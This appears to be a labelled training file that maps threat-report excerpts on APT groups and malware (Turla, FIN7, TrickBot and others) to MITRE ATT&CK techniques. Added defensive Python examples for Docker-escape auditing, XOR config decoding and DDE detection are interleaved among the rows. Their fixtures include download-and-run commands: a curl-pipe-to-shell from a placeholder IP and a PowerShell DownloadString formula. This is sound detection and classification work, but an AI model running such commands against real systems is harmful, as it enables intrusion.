807Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. xxmm (also known as Minzen) — This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Screen Capture Tool — This tool can capture the desktop of a victim's system (see Figure 5). Figure 5. Screen Capture Tool usage. RarStar — This custom tool uploads RAR archives to a specified URL as POST data (see Figure 6). RarStar encodes the POST data using Base64 and a custom XOR algorithm. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. WinRAR — This tool extracts tools for lateral movement and compresses data for exfiltration. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity. Install a background monitor tool (e.g['T1113 - Screen Capture']fine_tune
808The shellcode then creates a string that it uses to create a registry entry to automatically run the final payload each time the system starts. It then opens the registry key 'Software\Microsoft\Windows NT\CurrentVersion\Winlogon' and sets its "Shell" value to the previously created string. Ultimately, the following registry key is created for persistence['T1547.014 - Active Setup', 'T1547.004 - Boot or Logon Autostart Execution: Winlogon Helper DLL']fine_tune
809We at Team Nautilus detected and analyzed the Docker Hub account hildeteamtnt, which was used by TeamTNT to store their malicious images. Also, ‘minerescape’ contained a shell script executing a Python file - minedaemon.py. Using a web service (iplogger[.]org) to transmit collected data to the attacker during the discovery process, for instance, the number of cores in the CPU, its speed, system details (using uname -a), and targeted host IP address. Logging the activity and encoding it into files (using Base64). The script sbs.sh: - Downloading 00.jpg (as /usr/bin/dns_ipv4.tar.gz) which is the file /usr/bin/bioset. - Creating a child process that listens to the socket and communicates with the parent using a named pipe (also known as a FIFO); the parent is responsible for deciphering messages and writing them back to the child on the pipe. - Logging the activity and encoding it into files (using Base64). Defense Evasion Techniques: - Removing system logs (/var/log/syslog). - Deleting command history. - Encoding many snippets with Base64 (the same snippet may be encoded multiple times). To sum it up . Over four months, TeamTNT uploaded various images, with some being used to perform attacks in the wild['T1027 - Obfuscated Files or Information']fine_tune
810In September 2017, Proofpoint researchers detailed the history and ongoing activities of an actor we track as TA505. TA505 was behind many of the Dridex campaigns that plagued organizations in 2015 and introduced Locky ransomware in 2016, bringing unprecedented scale to malicious spam distribution. Since we wrote our original TA505 profile, the actor has continued to explore the use of new malicious attachments and new payloads. In 2018, though, the scale and regularity of their campaigns decreased, while the diversity of payloads has increased. Given the importance of this actor in the email threat landscape we wanted to revisit our profile and update it with the latest activity from TA505['T1566.001 - Phishing: Spearphishing Attachment']fine_tune
811Remember, Downadup/Conficker spread so widely because so many computers simply did not have a simple security patch, released months before the infections ever started, applied. - Use a robust security software suite that has multiple layers of protection. Even patched systems are continuing to become infected with the .A and .B variants. In many instances, this is occurring because the worm is being passed on via infected removable media, such as USB thumb drives, that are essentially acting as host carriers. - Use caution when opening attachments and accepting file transfers. Use caution when clicking on links to Web pages. Use strong passwords['T1091 - Replication Through Removable Media']fine_tune
812FIN6 used encoded PowerShell commands to install Cobalt Strike on compromised systems. The attacker made use of Cobalt Strike’s “psexec” lateral movement command to create a Windows service named with a random 16-character string on the target system and execute encoded PowerShell. In some cases, the encoded PowerShell commands were used to download and execute content hosted on the paste site hxxps://pastebin[.]com['T1102 - Web Service', 'T1569.002 - System Services: Service Execution']fine_tune
813At this point, the script establishes an HTTP connection to the C2 server. If the server response is comprised only of the same GUID that the malware sent, the script deletes itself. In the case of the second-stage script from Variant A, the script deletes the registry key where it is installed. In the case of Variant C, the script deletes the file from which it is running. If instead the server responds with any data other than the GUID, the second-stage script decrypts the data and saves it as a file['T1070.004 - Indicator Removal on Host: File Deletion', 'T1070 - Indicator Removal on Host']fine_tune
814Since the original publication of this approach, Proofpoint researchers have observed a number of actors -- “early adopters” -- abusing this file format by embedding it inside Microsoft Word and PDF documents. While the combination of the technique with the Microsoft Word container was described in the initial research, embedding inside PDFs has not been documented and likely originated with another source['T1204.001 - Malicious Link', 'T1204.002 - User Execution: Malicious File']fine_tune
815Then extract the image file "image1.jpeg" contained in the document. Find the special logo in the picture data, decode the subsequent steganographic PE data, release the randomly named .exe in the %ALLUSERSPROFILE% directory and run it['T1027.003 - Steganography']fine_tune
816Enables remote login - Enables screen sharing - Configures remote login permissions for the user - Allows remote login to all - Enables a hidden “root” account in macOS and sets the password specified in the Trojan code['T1569.001 - System Services: Launchctl']fine_tune
817The persistence is done during the first execution of the malware using a well-known technique, the “Logon scripts”. It creates a script file registration.bat and writes several strings from the TForm1 object. The final script is['T1037.001 - Boot or Logon Initialization Scripts: Logon Script (Windows)']fine_tune
818The backdoor starts by collecting basic information about the victim’s machine and calculating a 4-byte long victim identifier, based on the user-name, computer-name and the domain name of the target environment['T1082 - System Information Discovery']fine_tune
819To install Weave Scope on the server, the attackers use an exposed Docker API port and create a new privileged container from a clean Ubuntu image. The container is configured to mount the victim server's filesystem into the container, giving the attackers access to all files on the host. The initial command given to the container is to download and execute several cryptominers['T1611 - Escape to Host']fine_tune
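The row above describes the container-create request an attacker sends to an exposed Docker API: a privileged container with the host's root filesystem bind-mounted into it. The following Python is an added example, not code from the dataset or from any of the cited research: it audits request bodies in the shape of the Docker Engine API's POST /containers/create (the `HostConfig` fields used here, `Privileged`, `Binds`, `Mounts`, `PidMode`, `NetworkMode`, `IpcMode` and `CapAdd`, are the real API field names) and reports why a request could let the container reach the host. Both request bodies are constructed for the example; the address and script name in the escape request are placeholders, and only Linux-style paths are handled.

```python
import posixpath

# Host paths that, bind-mounted into a container, hand over the host or the Docker daemon.
SENSITIVE_HOST_PATHS = {"/", "/etc", "/root", "/proc", "/sys", "/boot", "/dev",
                        "/var/run/docker.sock", "/run/docker.sock"}
# Capabilities that on their own give a route out of the container.
DANGEROUS_CAPS = {"ALL", "SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "DAC_READ_SEARCH"}

# Constructed request bodies in the shape of POST /containers/create (Docker Engine API).
# They illustrate the pattern in the row above; they are not captured traffic.
ESCAPE_REQUEST = {
    "Image": "ubuntu:latest",
    "Cmd": ["/bin/sh", "-c", "chroot /host sh -c 'curl -s http://198.51.100.7/setup.sh | sh'"],
    "HostConfig": {"Privileged": True, "Binds": ["/:/host"], "PidMode": "host"},
}
BENIGN_REQUEST = {
    "Image": "nginx:1.25",
    "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"],
                   "PortBindings": {"80/tcp": [{"HostPort": "8080"}]}},
}


def host_source(bind):
    """Source half of a 'src:dst[:opts]' bind string, normalised (Linux paths assumed).
    Named volumes (no leading slash) pass through unchanged."""
    src = bind.split(":", 1)[0]
    return posixpath.normpath(src) if src.startswith("/") else src


def audit_create_request(req):
    """Return the reasons this create request could let the container reach the host."""
    hc = req.get("HostConfig") or {}
    reasons = []
    if hc.get("Privileged"):
        reasons.append("Privileged=true: all capabilities, raw access to host devices")
    for bind in hc.get("Binds") or []:
        src = host_source(bind)
        if src in SENSITIVE_HOST_PATHS:
            reasons.append(f"bind mount of sensitive host path {src!r} ({bind})")
    for mount in hc.get("Mounts") or []:
        src = posixpath.normpath(mount.get("Source", ""))
        if mount.get("Type") == "bind" and src in SENSITIVE_HOST_PATHS:
            reasons.append(f"Mounts entry binds sensitive host path {src!r}")
    for mode in ("PidMode", "NetworkMode", "IpcMode"):
        if hc.get(mode) == "host":
            reasons.append(f"{mode}=host: container shares the host namespace")
    added = set()
    for cap in hc.get("CapAdd") or []:
        cap = cap.upper()
        added.add(cap[4:] if cap.startswith("CAP_") else cap)
    if added & DANGEROUS_CAPS:
        reasons.append("CapAdd grants " + ", ".join(sorted(added & DANGEROUS_CAPS)))
    return reasons


def is_host_escape_risk(req):
    """True when the container could read or modify the host's root filesystem outright."""
    hc = req.get("HostConfig") or {}
    root_binds = [b for b in hc.get("Binds") or [] if host_source(b) == "/"]
    root_mounts = [m for m in hc.get("Mounts") or []
                   if m.get("Type") == "bind" and posixpath.normpath(m.get("Source", "")) == "/"]
    return bool(hc.get("Privileged") or root_binds or root_mounts)


if __name__ == "__main__":
    for name, req in (("escape", ESCAPE_REQUEST), ("benign", BENIGN_REQUEST)):
        print(name, is_host_escape_risk(req), audit_create_request(req))
```

Feed it the JSON bodies recorded by an authenticating proxy in front of the daemon socket, or by daemon-level audit logging; an unauthenticated TCP listener on 2375 is the precondition the row describes and should be closed rather than merely monitored.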
820Watering holes - Weaponized documents exploiting the Dynamic Data Exchange (DDE) method - Weaponized documents exploiting the CVE-2018-0798 vulnerability in Equation Editor - Exploitation of the CVE-2019-0604 vulnerability in Sharepoint - Supply chain attack that compromises a chat software installer, Able Desktop - Exploitation of recent vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in Microsoft Exchange Server['T1195.002 - Compromise Software Supply Chain', 'T1190 - Exploit Public-Facing Application']fine_tune
821This variant has exactly the same features as the previous variant: file listing, OS version getting, process killing, drive listing, execution via ShellExecuteW(), execution via named pipe, cleaning, file removal, file downloading. Here is an example of code similarities on the execution via named pipe function. On the left a sample from Bisonal 2014 and on the right Bisonal 2011['T1105 - Ingress Tool Transfer']fine_tune
822Despite the simplicity of most of their tools, the Gamaredon group also is capable of deploying some novelty, such as their Outlook VBA module. However, as it is far from stealthy, in the long run it is no match for a capable organization. The variety of tools Gamaredon has at its disposal can be very effective at fingerprinting a machine and understanding what sensitive data is available, then spreading throughout the network['T1025 - Data from Removable Media']fine_tune
823The communication between the malware and the server is based on the HTTP protocol and slightly varies between the samples. Every few seconds the backdoor sends a POST request to the C&C URL. The result is encrypted and sent back to another URL on the server as the parameter of a POST request['T1071.001 - Application Layer Protocol: Web Protocols']fine_tune
824Check for blocklisted usernames and computernames: The implant concatenates the username and computer it acquires from the infected endpoint's environment variables. This string is then checked against a list of blocklisted values to determine if the implant should continue execution or exit out. Check for blocklisted process names: The following process names are blocklisted and if found running on the system, the RAT implant will simply exit. The blocklist consists of processes belonging to Virtual Machine software (such as VMWare) and analysis tools (such as ProcessHacker etc['T1033 - System Owner/User Discovery', 'T1057 - Process Discovery', 'T1082 - System Information Discovery', 'T1497.001 - Virtualization/Sandbox Evasion: System Checks']fine_tune
825It also creates a unique system specific identifier that it will use during the C2 communications to send and receive messages. The system specific identifier is a 16 character string that the Trojan creates using the serial number of the C volume and the first 4 hexadecimal bytes from Environment.UserName['T1071.003 - Mail Protocols']fine_tune
826This document uses KernelCallbackTable as well to hijack the control flow just like our first module, the injection technique used by the shellcode also resembles the first document. The major difference in this document is that it tries to retrieve a remote HTML page and then executes it using mshta.exe. The remote HTML page is located at https[:]//markettrendingcenter[.]com/member.htm and throws a 404 Not Found which makes it difficult for us to analyze this document any further['T1218.005 - Signed Binary Proxy Execution: Mshta']fine_tune
8272) Download the OpenSSL library. Instead of saving the downloaded file, QakBot measures the download speed and deletes the received file['T1016.001 - System Network Configuration Discovery: Internet Connection Discovery']fine_tune
828This script is executed and is used to decode a static base64 string within the strEncode variable. The decoded binary is stored as HncModuleUpdate.exe and is then executed. This specific resource contains malicious shellcode used by the malware. These execution steps allow the launch of the new ROKRAT variant by decoding the PE binary and injecting it into the cmd.exe process['T1059.005 - Command and Scripting Interpreter: Visual Basic']fine_tune
829In their example, the OilRig group used a malicious macro document to deliver the backdoor, which is a tactic much more commonly used by them. A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation. Invoke-Obfuscation has proven to be highly effective at obfuscating PowerShell scripts and in this case, the adversary was able to take advantage of the tool for increased chances of evasion and as an anti-analysis tactic. Based on our telemetry, we have high confidence the email account used to launch this attack was compromised by the OilRig group, likely via credential theft. The malicious attachment was a simple PE file (SHA256: 5f001f3387ddfc0314446d0c950da2cec4c786e2374d42beb3acce6883bb4e63) with the filename <redacted> Technical Services.exe. Its sole purpose here is to install the QUADAGENT backdoor and execute it. Once the victim downloads and executes the email attachment, it runs silently with no additional decoy documents or decoy dialog boxes. The executable will drop the packaged QUADAGENT PowerShell script using the filename Office365DCOMCheck.ps1 in addition to a VBScript file with the same filename which will assist in the execution of it. Once the QUADAGENT payload has executed, it will use rdppath[.]com as the C2, first via HTTPS, then HTTP, then via DNS tunneling, each being used as a corresponding fallback channel if the former fails['T1204.001 - Malicious Link']fine_tune
830From our analysis, stealing keystrokes is the main function of RunningRat; however, the DLL has code for more extensive functionality. Code is included to copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and much more. However, our current analysis shows no way for such code to be executed['T1070.004 - Indicator Removal on Host: File Deletion', 'T1070.001 - Indicator Removal on Host: Clear Windows Event Logs']fine_tune
831BackdoorDiplomacy is a group that primarily targets diplomatic organizations in the Middle East and Africa, and less frequently, telecommunication companies. Their initial attack methodology is focused on exploiting vulnerable internet-exposed applications on webservers, in order to drop and execute a webshell. Post compromise, via the webshell, BackdoorDiplomacy deploys open-source software for reconnaissance and information gathering, and favors the use of DLL search order hijacking to install its backdoor, Turian. Finally, BackdoorDiplomacy employs a separate executable to detect removable media, likely USB flash drives, and copy their contents to the main drive’s recycle bin['T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking']fine_tune
832It will use an auto-run registry (HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run) named AdobeMX that will execute PowerShell to load the encoded executable via reflective loading (loading an executable from memory rather than from the system’s disks['T1059.001 - Command and Scripting Interpreter: PowerShell']fine_tune
833Change file owner and group. This utility is used by malware to change the user ID and/or the group ID of the specified files. This can lock other users out of access to the file, thus hampering removal or inspection. It may also be required in order to execute a file in certain elevated contexts['T1562.001 - Impair Defenses: Disable or Modify Tools']fine_tune
834The iContact binary appears to be a backdoor that gathers user and locale data and engages in encrypted communications with a C2 server over TCP. Functionality includes sending and receiving files and running custom commands such as scanning a directory and deleting files['T1005 - Data from Local System']fine_tune
835Overview of discovered Ramsay versions . Malicious documents dropping Ramsay version 1 . This attack vector consists of malicious documents exploiting CVE-2017-0199 intended to drop an older version of Ramsay. Based on the low complexity of the Ramsay agent delivered, the threat actors may be embedding this specific instance within these malicious documents for evaluation purposes. Even though affected documents will be modified, it won’t impact their integrity; each affected Word document remains fully operational after artifact appending has taken place. First, Ramsay looks for Word documents and also, in more recent versions, for PDFs and ZIP archives: Figure 13. Hex-Rays output of spreader scanning routines . It is important to notice that there is a correlation between the target drives Ramsay scans for propagation and control document retrieval. File structure changes during an infection and execution . All of the different artifacts involved in the infection stage are either within the context of the spreader or dropped previously by another Ramsay component. This information will be contained within all logged information Ramsay collects and may be leveraged by operators in order to do further lateral movement over the network in a later stage via a different channel. Ramsay and Retro filename conventions . It is important to highlight that among Retro’s documented techniques, it leverages malicious instances of msfte.dll, oci.dll and lame_enc.dll via Phantom DLL Hijacking. As previously documented, Ramsay also uses this technique in some of its versions, also using msfte.dll and oci.dll. Finally, we noticed Korean language metadata within the malicious documents leveraged by Ramsay, denoting the use of Korean-based templates['T1027 - Obfuscated Files or Information']fine_tune
836When G-Data published on Turla/Uroburos back in February, several questions remained unanswered. One big unknown was the infection vector for Turla (aka Snake or Uroburos). Our analysis indicates that victims are infected via a sophisticated multi-stage attack, which begins with the Epic Turla. In time, as the attackers gain confidence, this is upgraded to more sophisticated backdoors, such as the Carbon/Cobra system. Sometimes, both backdoors are run in tandem, and used to “rescue” each other if communications are lost with one of the backdoors['T1124 - System Time Discovery', 'T1057 - Process Discovery', 'T1049 - System Network Connections Discovery', 'T1018 - Remote System Discovery']fine_tune
837Thursday, April 16, 2020 . PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors . News summary . - Azerbaijan government and energy sector likely targeted by an unknown actor. For exfiltration, it uses FTP, which denotes an intention to transfer large amounts of data. Afterward, it copies 7,074,638 bytes from the end of the file and writes the remaining bytes back to the disk. One, called "frown.py," is responsible for the communications with the command and control (C2). It uses TLS to encrypt the communication that occurs on port 143. For each FTP usage, the credentials are provided by the C2 server during the request. The communication between the scripts is done via a file called "Abibliophobia23". Commands and results are written into the file using a custom encryption scheme. The binary uses a file system watcher in order to generate an event each time a file is modified in one of the directories in the "Paths" variable of the configuration file. Once a file is available, the Dog.exe binary exfiltrates it, using email or FTP depending on the configuration. Additional tools . During our investigation, we identified a couple of additional tools mainly in Python and compiled for Windows: - Klog.exe: A keylogger using an output file called "System32.Log". - Tre.py: A script used to create the file with the files/directories tree['T1105 - Ingress Tool Transfer']fine_tune
838This is an application document that has been used to provide a decoy to the Bisonal malware. This conference has some high-ranking government and business attendees. In 2019, a Russian RTF document — судалгаа.doc (research.doc) — was used with an exploit to drop the winhelp.wll file, which contains Bisonal. Based on our research and the released paper mentioned above, the Bisonal malware is part of the Tonto Team arsenal. Tonto Team was mentioned in the media in 2017 as one of the actors who targeted South Korea, when the country announced it would deploy a Terminal High-Altitude Air Defense (THAAD) in response to North Korean missile tests. At this time, researchers connected the Tonto Team to China['T1203 - Exploitation for Client Execution']fine_tune
839Various scans and queries are used to find proxy settings, domain controllers, remote desktop services, Citrix services, and network shares. If the obtained valid account is already a member of the domain admins group, the first lateral move in the network is usually to a domain controller where the adversary also deploys a Cobalt Strike beacon. Otherwise, a jump host or other system likely used by domain admins is found and equipped with a Cobalt Strike beacon. If the victim’s network contains other Windows domains or different network security zones, the adversary scans and finds the trust relationships and jump hosts, attempting to move into the other domains and security zones['T1021.002 - Remote Services: SMB/Windows Admin Shares', 'T1018 - Remote System Discovery']fine_tune
840The first of FIN7's new tools is BOOSTWRITE – an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. FIN7 has been observed making small changes to this malware family using multiple methods to avoid traditional antivirus detection, including a BOOSTWRITE sample where the dropper was signed by a valid Certificate Authority. One of the analyzed BOOSTWRITE variants contained two payloads: CARBANAK and RDFSNIFFER. While CARBANAK has been thoroughly analyzed and has been used maliciously by several financial attackers including FIN7, RDFSNIFFER is a newly-identified tool recovered by Mandiant investigators['T1553.002 - Code Signing']fine_tune
841TA505 has also recently used LOLbins and legitimate Windows OS processes to perform malicious activities and deliver a payload without being detected. As the entry point of an attack, it delivers a sophisticated email containing a malicious Excel or Word file['T1566.002 - Phishing: Spearphishing Link']fine_tune
842Tricks of the Trade: A Deeper Look Into TrickBot’s Machinations . TrickBot is a new banking Trojan. An Unusual Man-in-the-Browser Technique . Nowadays, most modern financial malware families are capable of injecting malicious code into ongoing browser sessions (e.g. For this purpose, and much like other advanced banking Trojans, TrickBot deploys a browser-hooking engine designed to intercept communications to and from the victim’s internet browser. With the real-time fetching trick, the malicious code injections themselves are kept securely on the attacker’s server, not in a file on the victim’s endpoint. 7) Finally, TrickBot’s financial module replaces the original response that would normally come from the bank with the C2’s response, and the injected page is displayed on the victim’s end. The actor can turn the webinjections on or off on the fly, easily modify the injections and then push an update to some or all the infected victims instantaneously. Figure 2: TrickBot’s Server Side Web-Injects — Top Level Flow. Figure 5: TrickBot and Dyre both use “sourcelink” and “sourcequery” for their communications. TrickBot passes the target URLs list to its financial module, which is injected into the browser using pipes communication. A redirection attack, in short, means that instead of injecting malicious code into the original webpage, the victim is now redirected to a new site forged by the fraudsters['T1185 - Browser Session Hijacking']fine_tune
843No exploits were used, so the victim would have to manually execute the malware dropper, which pretends to be an Adobe Flash installer. However, our analysis confirmed that Bad Rabbit uses the EternalRomance exploit as an infection vector to spread within corporate networks['T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1204.002 - User Execution: Malicious File']fine_tune
844The Rundll32Call exported function begins by creating a named event named ‘RunOnce’. This event ensures that only a single instance of DDKong is executed at a given time. If this is the only instance of DDKong running at the time, the malware continues. DDKong attempts to decode an embedded configuration using a single byte XOR key of 0xC3. Once decoded, the configuration contains the data shown in Figure 5 below['T1140 - Deobfuscate/Decode Files or Information']fine_tune
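The row above says DDKong decodes its embedded configuration with a single-byte XOR key of 0xC3. The Python below is an added example, not code from the dataset or from the cited report: it decodes such a blob when the key is known, and shows the two ways an analyst recovers the key when it is not (a crib of expected plaintext, or scoring every candidate key by how much of the output looks like text, with the shortcut that a NUL-padded record reveals the key as the most frequent ciphertext byte). The 64-byte `host|port|mutex` record is constructed for the example; the real DDKong configuration layout is not given on the page, only the key.

```python
from collections import Counter

KEY = 0xC3

# Constructed stand-in for an embedded configuration: a 64-byte, NUL-padded
# "host|port|mutex" record. The real DDKong layout is not described on the page.
CONFIG_PLAINTEXT = b"203.0.113.10|443|RunOnce".ljust(64, b"\x00")
ENCODED_CONFIG = bytes(b ^ KEY for b in CONFIG_PLAINTEXT)

# Bytes accepted as "looks like config text": printable ASCII plus NUL/TAB/LF/CR padding.
PLAUSIBLE = set(range(0x20, 0x7F)) | {0x00, 0x09, 0x0A, 0x0D}


def xor_single_byte(data, key):
    """XOR every byte with the same key; the operation is its own inverse."""
    return bytes(b ^ key for b in data)


def recover_key(blob, crib=None):
    """Brute-force the single-byte key. A crib (known plaintext) wins outright;
    otherwise the key whose output has the most plausible bytes wins."""
    best_key, best_score = 0, -1
    for key in range(256):
        candidate = xor_single_byte(blob, key)
        if crib is not None and crib in candidate:
            return key
        score = sum(b in PLAUSIBLE for b in candidate)
        if score > best_score:
            best_key, best_score = key, score
    return best_key


def key_from_padding(blob):
    """If the plaintext is NUL-padded, 0x00 ^ key == key, so the most frequent
    ciphertext byte is the key itself. Cheap first guess before brute force."""
    return Counter(blob).most_common(1)[0][0]


def parse_config(decoded):
    """Split the NUL-padded record into its fields (layout assumed for this example)."""
    host, port, mutex = decoded.rstrip(b"\x00").split(b"|")
    return {"host": host.decode(), "port": int(port), "mutex": mutex.decode()}


def decode_config(blob, key=None, crib=None):
    """Decode an embedded config, recovering the key first if it is not known."""
    if key is None:
        key = recover_key(blob, crib)
    return key, parse_config(xor_single_byte(blob, key))


if __name__ == "__main__":
    key, cfg = decode_config(ENCODED_CONFIG)
    print(f"key=0x{key:02X} config={cfg}")
```

The scoring approach is what makes the example transferable: a different sample with an unknown key, or a family that rotates keys between builds, still decodes without reading the routine in a disassembler first. The crib is the faster path when a field such as the mutex name is already known from sandbox output.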
845The formula uses a command prompt to run a PowerShell script that attempts to download and execute a second PowerShell script hosted at the URL hxxp://micrrosoft[.]net/winupdate.ps1. By default, Excel will not launch the command prompt application, but will do so with the user’s consent via the following dialog box in Figure 3['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1059.001 - Command and Scripting Interpreter: PowerShell']fine_tune
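The row above describes an Excel formula that makes the command prompt run PowerShell to fetch a second script, which Excel only does after the user accepts a warning dialog. The Python below is an added example, not code from the dataset or from the cited report: it scans a worksheet part of an .xlsx (the `xl/worksheets/sheetN.xml` files inside the zip) for cell formulas of the DDE link shape `app|'topic'!item` and flags those whose application or topic invokes a shell or fetches from the network. The sheet XML and the formula in it are constructed for the example; the assumption that Excel stores a DDE link in the cell's `<f>` element in that shape is the author's, and the defanged URL is the one quoted in the row.

```python
import re
import xml.etree.ElementTree as ET

NS = {"m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}

# Constructed xl/worksheets/sheet1.xml: one ordinary formula, one DDE formula of the
# kind described above (cmd launching PowerShell to fetch a remote script). The DDE
# text is an illustration, not a copy of the sample the row refers to.
SHEET_XML = """<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
<sheetData>
<row r="1"><c r="A1"><f>SUM(B1:B3)</f><v>0</v></c></row>
<row r="2"><c r="A2" t="str"><f>cmd|'/c powershell -w hidden -c IEX((New-Object Net.WebClient).DownloadString("hxxp://micrrosoft[.]net/winupdate.ps1"))'!A0</f><v>#REF!</v></c></row>
</sheetData>
</worksheet>"""

# "app|'topic'!item" is the shape of a DDE link formula (leading "=" optional).
DDE_RE = re.compile(r"^\s*=?\s*([A-Za-z0-9_.\\:-]+)\s*\|\s*'?(.*?)'?\s*!\s*\w+\s*$", re.S)
# Applications that should never be a DDE server in a business spreadsheet.
SHELL_APPS = {"cmd", "powershell", "pwsh", "mshta", "rundll32", "regsvr32", "wmic",
              "certutil", "cscript", "wscript", "msexcel", "msiexec"}
# Topic strings that smell like a download-and-execute chain.
SUSPICIOUS_TOPIC = re.compile(
    r"powershell|mshta|cmd(\.exe)?\b|downloadstring|invoke-expression|\biex\b|-enc|https?:|hxxp",
    re.I)


def classify_formula(formula):
    """Return None for a normal formula, else {app, topic, suspicious} for a DDE link."""
    m = DDE_RE.match(formula)
    if not m:
        return None
    app, topic = m.group(1), m.group(2)
    base = app.replace("/", "\\").rsplit("\\", 1)[-1].lower()   # strip any path
    if base.endswith(".exe"):
        base = base[:-4]
    suspicious = base in SHELL_APPS or bool(SUSPICIOUS_TOPIC.search(topic))
    return {"app": app, "topic": topic, "suspicious": suspicious}


def scan_sheet_xml(xml_text):
    """Walk every cell formula in a worksheet part; return (cell_ref, info) for DDE links."""
    root = ET.fromstring(xml_text)
    hits = []
    for cell in root.iterfind(".//m:c", NS):
        f = cell.find("m:f", NS)
        if f is None or not f.text:
            continue
        info = classify_formula(f.text)
        if info is not None:
            hits.append((cell.get("r"), info))
    return hits


if __name__ == "__main__":
    import sys
    import zipfile
    if len(sys.argv) > 1:   # scan every worksheet part of a real .xlsx
        with zipfile.ZipFile(sys.argv[1]) as z:
            for name in z.namelist():
                if name.startswith("xl/worksheets/") and name.endswith(".xml"):
                    for ref, info in scan_sheet_xml(z.read(name)):
                        print(name, ref, info)
    else:
        print(scan_sheet_xml(SHEET_XML))
```

Any DDE link is reported, with `suspicious` distinguishing the shell-launching ones from legitimate links to other Office documents, so the scanner can be run over a mail gateway's attachment quarantine without treating every DDE-enabled workbook as malicious.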
846the malicious DLL installed as a Print Processor is stored as a file on disk; the modules are stored in the registry by the installer (from the CrLnc.dat file) and are described in Table 6['T1547.012 - Boot or Logon Autostart Execution: Print Processors']fine_tune
847More specifically, Ramsay looks for any of two given encoded Hardware Profile GUIDs. One of these GUIDs is hardcoded as shown in Figure 14, while the other is dynamically generated based on the compromised victim’s machine. If any of the subject identifiers are found, parsing for a command signature will be attempted['T1082 - System Information Discovery']fine_tune
848Then, it drops C:\Users\Public\x.vbs. Then it drops, C:\Users\Public\Natso.bat. Then, it executes `Natso.bat`, which is a "fileless" UAC bypass found by James Forshaw. If C:\Windows\Finex still doesn't exist (which means the UAC bypass failed), it will update the Natso.bat and execute it using the code shown below. This is another UAC bypass technique based on fodhelper.exe. On our test machine, the last bypass was successful, and `C:\Windows\Finex` was successfully created. After that, the DLL deletes the dropped file and exits['T1070.004 - Indicator Removal on Host: File Deletion']fine_tune
849To install this module, drop the entire PowerSploit folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable['T1574.007 - Path Interception by PATH Environment Variable']fine_tune
850As covered above, the attacker dropped two files: Chaos and Client. Chaos is the backdoor that enables the reverse shell and Client is needed to initiate the connect-back from Chaos['T1573.001 - Symmetric Cryptography', 'T1059.004 - Command and Scripting Interpreter: Bash']fine_tune
851Turla has many names in the information security industry — it is also known as Snake, Venomous Bear, Uroburos and WhiteBear. Turla likes to use compromised web servers and hijacked satellite connections for their command and control (C2) infrastructure. In some operations, they also do not directly communicate to the C2 server. Instead, they use a compromised system inside the targeted network as a proxy, which forwards the traffic to the real C2 server. Well-known malware like Crutch or Kazuar are attributed to Turla. Lately, we have also seen research that has shown potential links between the Sunburst backdoor and Turla. Not every campaign run by Turla can clearly be attributed to them['T1584.004 - Server']fine_tune
852Create processes - Write responses from the control server to a file - Send information for all drives - Write data sent by the control server to a temporary file matching the file path pattern %temp%\DWS00* - Change the time of a file as specified by the control server['T1070.006 - Indicator Removal on Host: Timestomp']fine_tune
853Something that makes Kobalos unique is the fact that the code for running a C&C server is in Kobalos itself. Any server compromised by Kobalos can be turned into a C&C server by the operators sending a single command. As the C&C server IP addresses and ports are hardcoded into the executable, the operators can then generate new Kobalos samples that use this new C&C server['T1059.004 - Command and Scripting Interpreter: Bash']fine_tune
854Finally, the command: system_profiler SPHardwareDataType 2>/dev/null || awk '/Boot ROM Version/ {split($0, line, ":");printf("%s", line[2]);}' checks if the machine is one of the following: "MBP", "MBA", "MB", "MM", "IM", "MP" and "XS". These codes represent the model of the system. For instance, "MBP" stands for MacBook Pro, "MBA" stands for MacBook Air and so on['T1497.001 - Virtualization/Sandbox Evasion: System Checks']fine_tune
855Whenever winword makes any graphical call, the shellcode executes. This technique to hijack control flow has also been used by other sophisticated attackers such as FinFisher. Lazarus has also used other novel methods to execute shellcode such as by using the function EnumSystemLocalesA as a callback to shellcode written to executable heap['T1140 - Deobfuscate/Decode Files or Information', 'T1574.013 - KernelCallbackTable', 'T1620 - Reflective Code Loading']fine_tune
856X-Session: 0"). Its presence on a compromised system allows a threat actor to execute a wide variety of commands, including uploading and downloading files, and spawning a reverse shell. DLL side loading is often used to maintain persistence on the compromised system. Its presence on a compromised system allows a threat actor to spawn a reverse shell, upload or download files, and capture keystrokes. Antivirus detection for HttpBrowser is extremely low and is typically based upon heuristic signatures. DLL side loading has been used to maintain persistence on the compromised system. More information about HttpBrowser is available in Appendix B. HttpBrowser URI. ChinaChopper web shell — A web-based executable script (see Figure 4) that allows a threat actor to execute commands on the compromised system. ChinaChopper web shell. shown in Figure 4, are required to interact with the web shell['T1059.003 - Command and Scripting Interpreter: Windows Command Shell']fine_tune
857WINEKEY maintains persistence through reboot via the use of registry RUN keys. Searching for anomalous RUN keys enterprise-wide can help to identify systems impacted by this malware['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder']fine_tune
858This specific module appears to have been put together from public sources with some added functionality from the attackers. Perhaps the most interesting part here is the unusual command and control mechanism based on TCP/UDP packets, as well as the C&C hostname which fits previously known Turla activity['T1205 - Traffic Signaling']fine_tune
